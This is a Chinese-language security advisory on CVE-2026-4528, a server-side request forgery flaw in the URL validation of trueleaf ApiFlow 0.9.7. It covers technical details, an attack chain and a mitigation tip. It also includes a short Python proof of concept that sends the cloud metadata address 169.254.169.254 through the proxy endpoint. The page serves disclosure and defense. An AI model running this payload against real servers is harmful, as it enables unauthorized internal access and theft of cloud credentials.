IPBUF安全漏洞报告
English
CVE-2026-4528 CVSS 7.3 高危

CVE-2026-4528 trueleaf ApiFlow 存在服务器端请求伪造漏洞

披露日期: 2026-03-21

漏洞信息

漏洞编号
CVE-2026-4528
漏洞类型
服务器端请求伪造 (SSRF)
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
trueleaf ApiFlow

相关标签

SSRFApiFlowURL ValidationServer-Side Request Forgerytrueleaf

漏洞概述

trueleaf ApiFlow 0.9.7 版本中存在一处高危安全漏洞,该漏洞位于URL验证处理组件的`validateUrlSecurity`函数中。由于对用户输入的校验逻辑存在缺陷,攻击者可利用此漏洞实施服务器端请求伪造(SSRF)攻击。该漏洞无需身份认证且无需用户交互即可远程利用。鉴于利用代码已公开,攻击者可能借此探测内网服务或窃取敏感数据,建议立即修复。

技术细节

该漏洞的核心在于 trueleaf ApiFlow 0.9.7 版本中 `packages/server/src/service/proxy/http_proxy.service.ts` 文件内的 `validateUrlSecurity` 函数存在逻辑缺陷。该函数本应验证用户提交的 URL 以防止恶意请求,但其实现方式未能覆盖所有攻击场景。攻击者可以通过构造包含内网 IP 地址(如 127.0.0.1、169.254.169.254)或特定端口号的恶意 URL,绕过服务器的过滤机制。由于服务端未对请求目标进行严格的白名单限制或重定向检测,应用程序会直接解析并代理该请求。攻击者利用此 SSRF 漏洞,可以扫描服务器所在内网的开放端口,访问受限的内部服务,甚至利用 Gopher 协议攻击内部数据库。CVSS 评分 7.3 表明其具有较高的危害性,且利用门槛低,无需任何权限即可触发。

攻击链分析

STEP 1
侦察
攻击者识别出目标运行的是 trueleaf ApiFlow 0.9.7 版本。
STEP 2
构造载荷
攻击者构造包含内网 IP(如 127.0.0.1 或云元数据地址)的恶意 URL。
STEP 3
发送请求
攻击者将恶意 URL 发送给 validateUrlSecurity 函数处理。
STEP 4
SSRF 触发
服务器验证失败,向内网地址发起请求,返回敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # CVE-2026-4528 PoC Example # Target: trueleaf ApiFlow 0.9.7 # Description: SSRF via validateUrlSecurity bypass target_url = "http://target-host:port/api/proxy" # Attempt to access internal metadata (AWS/GCP/Azure) internal_target = "http://169.254.169.254/latest/meta-data/" payload = { "url": internal_target } try: response = requests.post(target_url, json=payload, timeout=5) if response.status_code == 200: print("Vulnerability confirmed! Internal access successful.") print(response.text[:200]) else: print(f"Attempt failed with status code: {response.status_code}") except Exception as e: print(f"Error: {e}")

影响范围

trueleaf ApiFlow 0.9.7

防御指南

临时缓解措施
建议在网络防火墙层面限制 ApiFlow 应用的出站连接权限,仅允许访问业务必需的外部地址,并阻断对内网网段的访问。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表